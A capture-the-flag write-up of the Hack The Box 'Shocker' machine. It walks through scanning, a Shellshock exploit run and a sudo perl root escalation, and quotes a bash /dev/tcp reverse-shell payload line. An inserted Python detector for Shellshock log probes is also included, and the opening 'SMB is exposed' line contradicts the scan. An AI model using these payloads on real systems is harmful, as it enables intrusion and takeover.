SMB is exposed.
```
# nmap -A -n -F -T5 shocker.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 03:23 UTC
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.045s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer|general purpose|VoIP phone|broadband router
Running (JUST GUESSING): HP embedded (90%), IBM AIX 4.X (86%), Tadiran embedded (85%), Wind River VxWorks 5.X (85%), Motorola embedded (85%), Microsoft Windows 2003|XP (85%)
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000 cpe:/o:ibm:aix:4.3 cpe:/h:tadiran:flexset-ip_280s cpe:/o:windriver:vxworks:5.4 cpe:/h:motorola:surfboard_sbv5121 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp
Aggressive OS guesses: HP 170X print server or Inkjet 3000 printer (90%), HP LaserJet 4250 printer (87%), IBM AIX 4.3 (86%), Tadiran FlexSet-IP 280S VoIP phone (85%), Motorola SURFboard SBV5121 broadband router (VxWorks 5.4) (85%), Microsoft Windows Server 2003 SP2 (85%), Microsoft Windows XP (85%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
```
Let's take a look at port 80.
```
# gobuster dir -u http://shocker.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://shocker.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/16 03:30:41 Starting gobuster
===============================================================
Progress: 65661 / 220561 (29.77%)
```
Using dirb, we find that /cgi-bin/user.sh exists.
```
# dirb http://shocker.htb/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 16 07:39:22 2020
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:137)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)

-----------------
END_TIME: Sun Aug 16 07:57:47 2020
DOWNLOADED: 4612 - FOUND: 3

# dirb http://shocker.htb/cgi-bin/ -w /usr/share/dirb/common.txt -X .sh

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 16 08:01:30 2020
URL_BASE: http://shocker.htb/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages
EXTENSIONS_LIST: (.sh) | (.sh) [NUM = 1]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://shocker.htb/cgi-bin/ ----
+ http://shocker.htb/cgi-bin/user.sh (CODE:200|SIZE:118)

-----------------
END_TIME: Sun Aug 16 08:20:29 2020
DOWNLOADED: 4612 - FOUND: 1
```
Given the machine name, let's try Shellshock.
```
# searchsploit shellshock
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                        | cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection                                                          | linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection                                                     | linux/remote/34766.php
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)                                                   | cgi/webapps/34895.rb
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)                                               | hardware/remote/39568.py
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)                                         | linux/remote/36933.py
GNU Bash - 'Shellshock' Environment Variable Command Injection                                                  | linux/remote/34765.txt
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                                  | cgi/remote/39918.rb
NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)                                                    | cgi/webapps/40213.txt
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection                                                          | linux/remote/34879.txt
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection                             | php/webapps/35146.txt
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection                                             | linux/remote/34896.py
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection                                           | linux/local/40938.py
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)                   | cgi/webapps/39887.txt
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection                     | hardware/remote/40619.py
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

# searchsploit -m linux/remote/34900.py
# sed -i 's/\r//' 34900.py
# python 34900.py payload=reverse rhost=10.10.10.56 lhost=172.17.0.2 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 172.17.0.1
172.17.0.1> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
172.17.0.1> pwd
/usr/lib/cgi-bin
172.17.0.1> cat /home/shelly/user.txt
2ec24e11320026d1e70ff3e16695b233
172.17.0.1> sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
172.17.0.1> sudo /usr/bin/perl -e 'exec "/bin/bash";'
172.17.0.1> id
uid=0(root) gid=0(root) groups=0(root)
172.17.0.1> cat /root/root.txt
52c2715605d70c7619030560dc1ca467
```
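From the defender's side, the Shellshock probe against /cgi-bin/user.sh above leaves a clear trace: mod_cgi exports request headers such as User-Agent and Referer into the script's environment, so the `() { :;};` function-definition prefix lands verbatim in the Apache access log. The following detector is an added example, not code from the original writeup or from exploit-db; the log lines are constructed samples in Apache combined format and the function names are assumptions.

```python
import re
from typing import List

# Shape of a Shellshock probe: a bash function body "() { ... }" followed by a ";" and
# trailing commands, which an unpatched bash executed when it imported the variable.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")

# Apache "combined" format; the last two quoted fields are the Referer and User-Agent
# headers, which mod_cgi hands to the script as HTTP_REFERER / HTTP_USER_AGENT.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Constructed sample lines (not from the original page); the first two carry a probe.
SAMPLE_LOG = [
    '10.10.14.7 - - [16/Aug/2020:03:40:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 '
    '"-" "() { :;}; /bin/bash -c id"',
    '10.10.14.7 - - [16/Aug/2020:03:41:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 '
    '"() { :; }; echo probe" "Mozilla/5.0"',
    '10.10.14.8 - - [16/Aug/2020:03:42:55 +0000] "GET /index.html HTTP/1.1" 200 137 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
]


def find_shellshock(lines: List[str]) -> List[dict]:
    """Return one record per log line whose Referer or User-Agent carries a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess at fields
        for header in ("referer", "user_agent"):
            if SHELLSHOCK_RE.search(m.group(header)):
                parts = m.group("req").split()
                path = parts[1] if len(parts) > 1 else m.group("req")
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": path,
                    "header": header,
                    "status": m.group("status"),
                    # a 200 against /cgi-bin/ means a script ran with the tainted environment
                    "cgi_target": path.startswith("/cgi-bin/"),
                })
                break  # one record per line is enough
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

A hit with `cgi_target` true and status 200 is the case worth escalating; the same regex can be applied to the Cookie or Host header if the log format records them.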
Because Kali Linux is running in Docker, 34900.py has been partly modified.
```
# diff 34900.py /usr/share/exploitdb/exploits/linux/remote/34900.py
76c76
< payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.7/"+str(lport)+" 0>&1 &"
---
> payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
```
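Review bot: with the address hardcoded at line 76, the `lhost` variable is no longer read by the reverse payload, so the `lhost=172.17.0.2` argument in the run above has no effect and will mislead a reader; either add a comment next to the literal saying why the container address cannot be used, or keep `lhost` in the string and pass the intended value on the command line.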